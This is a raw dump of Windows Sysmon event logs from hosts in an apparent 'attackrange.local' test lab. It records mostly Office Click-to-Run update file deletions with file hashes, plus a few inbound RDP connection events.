AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ODBC Drivers\Salesforce\lib\sbicudt58_64.dllMD5=B6525CDEC4EB6421B5C32EDEB31C6822,SHA256=37521F70E98328E637CE57C522EF64989CE87F65396A1C63A3602CA1944E2080,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000069293Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:22.673{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=632044B30B9EFC5D0F8BBF940E8BC85F,SHA256=9F97E23DC030B5E259E3419DAD98A99C2A20E506C49253521C1D345A7199CCAB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069292Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:22.486{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ODBC Drivers\Salesforce\lib\cacerts.pemMD5=3ADEF09E6A80026BE33C7D5CE29F03D3,SHA256=9F7AE4218F627F4D8B2DE64A04F192025CDDC5DE488B7DAEFC8A87C6A79EA954,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069291Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:22.470{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ODBC Drivers\Salesforce\lib\OpenSSL64.DllA\zlibwapi.dllMD5=C51BB9322C59E2AD09DAF9CE9BC108F8,SHA256=C5E9E112D83F4EC191DA12084C6854E98EE99231BBD6ED2F38BCDE38EEBFD079,IMPHASH=AA8B89D46B51E3CA4A0D11459C181DF0truetrue 23542300x800000000000000069290Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:22.470{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ODBC Drivers\Salesforce\lib\OpenSSL64.DllA\openssl64.dlla.manifestMD5=3CCE9F50A5D24BFC7CCECC37E3603EB6,SHA256=DC968206AE8139A421AE26FE3A49446D72F2CBD4C30B34B6777F10A1CAC3978F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069289Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:22.470{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ODBC Drivers\Salesforce\lib\OpenSSL64.DllA\libssl-1_1-x64.dllMD5=460C06E58F6E9222308755A14886D2C6,SHA256=EADA3200C93EA93A4B011AA23CDF573F64A7B857C7FA478D4F0DC81528621751,IMPHASH=F18FB023B04B443C3E9F25B1B472D0C8truetrue 23542300x800000000000000069288Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:22.454{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ODBC Drivers\Salesforce\lib\OpenSSL64.DllA\libcrypto-1_1-x64.dllMD5=29ACDE08DC8DE8F7F4B883682C0334BA,SHA256=89D5101FB636B65962CA45A5ECA585A7BFB8EF1E950307F997B5BED02619C6BE,IMPHASH=93816E761E9CDCEC68C173BAF890878Ftruetrue 23542300x800000000000000069287Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:22.423{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ODBC Drivers\Salesforce\lib\LibCurl64.DllA\libcurl64.dlla.manifestMD5=41E5AA78417F14584B9B8472BEEEB888,SHA256=519172FB949453597F26223837008BC8674401E111B84E1499922B82EF8389C1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069286Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:22.423{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ODBC Drivers\Salesforce\lib\LibCurl64.DllA\libcurl.dllMD5=DB0397611349CBFA7B6DACC325D5729F,SHA256=8AFF6AC5F33DBC0E8E80C8D853B01644A4B5A9B2D2D55C216FF4DF83DEFE974C,IMPHASH=177783C00B3A58597D371AB67DD5DB3Btruetrue 23542300x800000000000000069285Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:22.408{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ODBC Drivers\Salesforce\lib\LibCurl64.DllA\OpenSSL64.DllA\zlibwapi.dllMD5=C51BB9322C59E2AD09DAF9CE9BC108F8,SHA256=C5E9E112D83F4EC191DA12084C6854E98EE99231BBD6ED2F38BCDE38EEBFD079,IMPHASH=AA8B89D46B51E3CA4A0D11459C181DF0truetrue 23542300x800000000000000069284Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:22.408{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ODBC Drivers\Salesforce\lib\LibCurl64.DllA\OpenSSL64.DllA\openssl64.dlla.manifestMD5=3CCE9F50A5D24BFC7CCECC37E3603EB6,SHA256=DC968206AE8139A421AE26FE3A49446D72F2CBD4C30B34B6777F10A1CAC3978F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069283Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:22.408{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ODBC Drivers\Salesforce\lib\LibCurl64.DllA\OpenSSL64.DllA\libssl-1_1-x64.dllMD5=460C06E58F6E9222308755A14886D2C6,SHA256=EADA3200C93EA93A4B011AA23CDF573F64A7B857C7FA478D4F0DC81528621751,IMPHASH=F18FB023B04B443C3E9F25B1B472D0C8truetrue 23542300x800000000000000069282Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:22.392{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ODBC Drivers\Salesforce\lib\LibCurl64.DllA\OpenSSL64.DllA\libcrypto-1_1-x64.dllMD5=29ACDE08DC8DE8F7F4B883682C0334BA,SHA256=89D5101FB636B65962CA45A5ECA585A7BFB8EF1E950307F997B5BED02619C6BE,IMPHASH=93816E761E9CDCEC68C173BAF890878Ftruetrue 23542300x800000000000000069281Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:22.361{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ODBC Drivers\Salesforce\lib\1033\SQLENGINEMESSAGES.XMLMD5=FA8501E75E6AE8D3B99D335189F621B5,SHA256=DAD12C115FCABFE8A4B773371C6DB92677EDAB168BDCE5FB9772F837B0C0EC3F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069280Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:22.361{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ODBC Drivers\Salesforce\lib\1033\SFMESSAGES.XMLMD5=FE7876695F15EEB5F0869ABC4BCC8D6D,SHA256=B8624780EDEF4AAFFA3E62440C26D737C1D7062404CE50852DC13343BC6456B3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069279Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:22.361{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ODBC Drivers\Salesforce\lib\1033\PGOMESSAGES.XMLMD5=50302C0F7DE0313029EA4DA93748232A,SHA256=65654AFB0EB34C977805BF1F37C29B6C9B7AB608A6EE23A0217B5AD7D457710D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069278Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:22.361{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ODBC Drivers\Salesforce\lib\1033\ODBCMESSAGES.XMLMD5=AFC8083E623B8CE36E64B32629A09776,SHA256=BFFF66EF87B1AA12C7F67150994CF7A73FB8D37D2B8C7D375C615D7D6C06215B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069277Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:22.361{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ODBC Drivers\Salesforce\lib\1033\DSMESSAGES.XMLMD5=52F99D2FEE1D7D44FDED542E444EBDD8,SHA256=E8F0042AF4F677F16A3D16FA56CBEFEA2D3AC91812F1C9AEED6CA720BCCE4D43,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069276Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:22.361{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ODBC Drivers\Redshift\lib\sbicuuc53_64.dllMD5=B704796AE75E69D656065DF160DACB2C,SHA256=FA8ADF27AD48B7F6D0D8BADBA4D1F281464B893625C23E9F89D8E4CE61C0F09B,IMPHASH=4F756DCBAB005A73CF18FC5D74E08406truetrue 23542300x800000000000000069275Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:22.345{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ODBC Drivers\Redshift\lib\sbicuin53_64.dllMD5=AF0B0BD948EF47889917EA201798CF4D,SHA256=98EA304365647242D089CF60F85AE5793A6A7ECD5E3CA78554D5D8D5DE905DD8,IMPHASH=F0C7D4F44A18A527224E8627B8681BE4truetrue 23542300x800000000000000069274Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:22.314{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ODBC Drivers\Redshift\lib\sbicudt53_64.dllMD5=EF09DF5386F5275543820D98A448A3AA,SHA256=A2D0E5DCBCAED9F7E71F2E6810001AECADFA7F03CA71EB8256BD15A5FD772A8B,IMPHASH=00000000000000000000000000000000truetrue 354300x800000000000000069273Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.015{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-29038-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000069272Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.910{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-31768-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000069271Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:22.080{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ODBC Drivers\Redshift\lib\amazonredshiftodbc_sb64.dllMD5=D0725200A64A378E031E316A0366D0A0,SHA256=D5A898ED087589AEDA54063CC366CC4593D06FA330C6AC7C0FF8592095612807,IMPHASH=8E4E2BB70D7097434613AA786FE0AA34truetrue 23542300x800000000000000049752Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:22.862{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=22C19686DC879D1494B4ED79F57E5FF0,SHA256=14CAE41BF1CC02D79DAA7B8445CF9AEE608D525863D98281F79C8A40A3DADA91,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069469Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.970{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PROOF\MSSP7ES.dubMD5=DE504021F3652C12A3399EDEAFEEA3D7,SHA256=FE252502B4A24DD9C39DC629BD5C2E17867AC95CD6C2180514B45E11E1F5F79A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069468Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.970{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PROOF\MSSP7EN.LEXMD5=22E8A79BE7A54118FAB3A2C6EA5BF76B,SHA256=5AEB8A09A02D7F85E6219D4919BE69697D905FB582CCDFEFDF1F3A33E71AEF7E,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000069467Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.939{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PROOF\MSSP7EN.dubMD5=CCD675228D695BBEFCECB7FF4EE397E1,SHA256=75776FE6B29D7AE0BDCD89E9679E488F9E65001E84F62EA381B9A7F91EAAD912,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069466Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.939{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PROOF\MSHY7FR.LEXMD5=B24433E37714B3F205FFEA39F02E564E,SHA256=BDB37CD64F48D47F0AAE308E9BF9418FBFB5F8323BD2A96868F6F1DD2FA91196,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000069465Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.892{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PROOF\MSHY7FR.DLLMD5=4840AC95A2E6E0A14FDF543C0AADBE16,SHA256=AE2CB428C7C41BDF29C6EBFEEB2DAB2D2B4C9BD4982FA4D48EDD18A4305C0000,IMPHASH=920168E3F9A3DDC8E35F6758ED7F6C87truetrue 23542300x800000000000000069464Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.892{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PROOF\MSHY7ES.LEXMD5=3F93AEE0C8661AEB94D61C0C6F16A503,SHA256=D8DA0FE3936A40B6A0AFC0E43EE3EF5A3ACE1784F868E8B46443D97F1619DCD7,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000069463Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.892{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PROOF\MSHY7ES.DLLMD5=BB626A9935C35E7EB8EA1AEC05444B18,SHA256=92E75663061204146584D99A7430780451C6414AB837F98EE962D390D9EDC39D,IMPHASH=920168E3F9A3DDC8E35F6758ED7F6C87truetrue 23542300x800000000000000069462Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.892{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PROOF\MSHY7EN.LEXMD5=ACC709B128279269FDA3569132B09C58,SHA256=8D3CCCB2D688E2405D759893712EB320A470BF3DA7939FD3FC0587F4E22AAFBE,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000069461Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.876{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PROOF\MSHY7EN.DLLMD5=5170326AA0CB4751C416B084F6B1F66A,SHA256=A5AA7D773C7A4DA4459EC6B5AC15D8D251866498C29168B3FC4545B8BC4731CC,IMPHASH=920168E3F9A3DDC8E35F6758ED7F6C87truetrue 23542300x800000000000000069460Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.876{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PROOF\msgrammar8.dllMD5=603C1DBC6374EA44B7B46C1139BF2C30,SHA256=5C42F44B80E62ACCCAC7A9F89EC517D71A975829D251C9465B36DBB8BF09530F,IMPHASH=61D82BB94C73C5DA8283A5460F61DDB3truetrue 23542300x800000000000000069459Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.861{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PROOF\MSGR8FR.LEXMD5=0C66822D1F0834F979A9B72D90D633A6,SHA256=7194278ED51A336BDD38B81CC636F3B915B2DC19C4782C4557BA122B006197FE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069458Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.767{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PROOF\msgr8fr.dubMD5=89A6D6E39F7DDB956A19D5F7F64A148E,SHA256=353AC9F522F71EC6DFA7BD57B54B4C20175727918114052AB125F06931387CB7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069457Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.767{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PROOF\MSGR8ES.LEXMD5=298AB8843ED716D1CE618D95AB1E3537,SHA256=2BD27FB927CA0ED058A75E921C74C84D32EF885EBD3DAEC4066604336A383EAE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069456Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.673{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PROOF\msgr8es.dubMD5=89A6D6E39F7DDB956A19D5F7F64A148E,SHA256=353AC9F522F71EC6DFA7BD57B54B4C20175727918114052AB125F06931387CB7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069455Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.673{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PROOF\MSGR8EN.LEXMD5=F2B61DC174096E8B08A247F2F3582FCC,SHA256=A195FB2620E10C363CA93E5E0280108410631A566ECDBF4EAB8637DA3D5D4A5F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069454Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.486{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PROOF\msgr8en.dubMD5=89A6D6E39F7DDB956A19D5F7F64A148E,SHA256=353AC9F522F71EC6DFA7BD57B54B4C20175727918114052AB125F06931387CB7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069453Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.486{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PROOF\msgr3jp.dllMD5=1472C6CBBE7162D1B2AA5ADE15A2A6F6,SHA256=6FE576A6C8509A2C5198E806D67C596C545FAA8FAF62B6452D8D26BBDDEEC462,IMPHASH=535769B8ED6A0E824C907C3C51E4F149truetrue 23542300x800000000000000069452Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.486{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PROOF\LTSHYPH_FR.LEXMD5=6E0A425EDB81D44523AC1B6FD9CA8DFE,SHA256=56340B71B462CC254001DFC3A1280049EAF16C563AF84EE9BA0A205CE3529EE4,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000069451Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.470{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PROOF\LTSHYPH_ES.LEXMD5=6A217EA1C821F00E7E8D6B09CD193A02,SHA256=0D8B6A3F3671C66D594E94DC8FC7C1A840DFBF102C6086F18721ADE34E5F24E7,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000069450Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.470{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft 